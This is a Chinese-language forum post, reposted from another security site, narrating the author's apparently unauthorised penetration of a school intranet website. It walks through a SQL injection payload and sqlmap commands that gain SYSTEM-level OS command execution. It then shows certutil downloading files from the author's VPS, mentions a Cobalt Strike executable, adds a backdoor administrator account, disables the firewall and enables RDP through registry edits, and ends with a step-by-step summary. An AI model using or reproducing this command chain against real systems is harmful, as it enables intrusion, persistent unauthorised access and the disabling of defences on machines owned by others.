標題:記一次不曲折的校內站點滲透

taibeihacker

Moderator

0x01 前言​

備考的時候偶然點了進了本校內網的某個站點, 停下了複習(直接拔劍)
1049983-20220106104512280-663778906.png

0x02 渗透过程​

測試到注入
http://url/newdetail.aspx?id=11999' or 1=1 --
直接Sqlmap一把過, 連waf都沒得(狗頭)
1049983-20220106104513053-178884482.png

隨便看看
python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch --dbs
python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch -users
1049983-20220106104514484-1843347150.png

DBMSsqlserver 2005
1049983-20220106104515166-53616618.png

whoami在windows中nt authority system是內置的系統管理賬戶
1049983-20220106104515748-751391338.png

查看下目錄chdir
1049983-20220106104516268-1231909659.png

Dir c:\
1049983-20220106104516970-1699368559.png

OS版本Microsoft(R) Windows(R) Server 2003, Enterprise Edition
1049983-20220106104517567-176420855.png

ipconfig
1049983-20220106104518165-559949965.png

服務器端存在certutil等於是決定測試一下命令
vps
python -m SimpleHTTPServer 80
打一下
ping wt070h.dnslog.cn
certutil.exe -urlcache -split -f http://funny_ip/amazing1x
發現回顯
1049983-20220106104518717-936528931.png

奈何網站路徑是中文的, sqlmap寫木馬的話會亂碼, 找了找解決辦法無果
1049983-20220106104519086-1291404844.png

看看環境變量
1049983-20220106104520682-227088344.png

Nmap看看端口因為嘗試遠程連接的時候出了一些問題,起初不知道是什麼原因所以打算看看
1049983-20220106104523407-1707021554.png

尝试远程连接3389新建用戶
#新建用戶
net user amazingadmin123 amazing.123456 /add
#賦予權限
net localgroup Administrators amazingadmin123 /add
#激活用戶
net user amazingadmin123 /active:yes
#關閉防火牆
netsh firewall set opmode mode=disable
#開啟默認設置netsh firewall reset
通過註冊表開啟3389端口
echo Windows Registry Editor Version 5.00 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 3389.reg
echo 'fDenyTSConnections'=dword:00000000 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 3389.reg
echo 'ortNumber'=dword:00000D3D 3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 3389.reg
echo 'PortNumber'=dword:00000D3D 3389.reg
regedit /s 3389.reg相關記錄
1049983-20220106104525073-1391786797.png

相關記錄
1049983-20220106104525998-665197367.png

這個過程連續嘗試了兩三次都沒有成功,也沒找到原因,服務還關了,只能先考試等管理員開機了
1049983-20220106104526502-908582224.png

考完試第三天網站上線了,再試試新建用戶……
原來是安全策略的問題,不能使用簡單地密碼,新建用戶的時候用了個複雜的密碼就行了
远程连接️
1049983-20220106104527002-46563665.png

配置加載中……
1049983-20220106104527472-1245304440.png

1049983-20220106104528176-432036921.png

0x03 总结​

1.發現主頁存在一處注入點http://url/newdetail.aspx?id=11999' or 1=1 --2.通過SQLMAP進行注入,執行命令:sql-shellselect @@version; //查詢數據庫版本sql-oswhoami //發現是system權限sql-oschdir //查看目錄sql-osdir c: //列出C盤目錄sql-ossysteminfo //查看系統版本sql-osipconfig //查看系統IPsql-oscuertutil //測試是否存在cuertutil 下載命令3.在VPS搭建HTTP服務器python -m SimpleHTTPServer 804.可以將cs生成exe上傳到VPS服務器上。 5.通過NAMP掃描目標系統開放端口,發現3389存在6.創建用戶並添加到管理員權限,且啟用賬號和關閉防火功能#新建用戶sql-osnet user amazingadmin123 Admin@12$12 /add#賦予權限sql-osnet localgroup Administrators amazingadmin123 /add#激活用戶sql-osnet user amazingadmin123 /active:yes#關閉防火牆sql-osnetsh firewall set opmode mode=disable7.通過mstsc成功遠程連接
原文鏈接:https://xz.aliyun.com/t/9444
 
返回
上方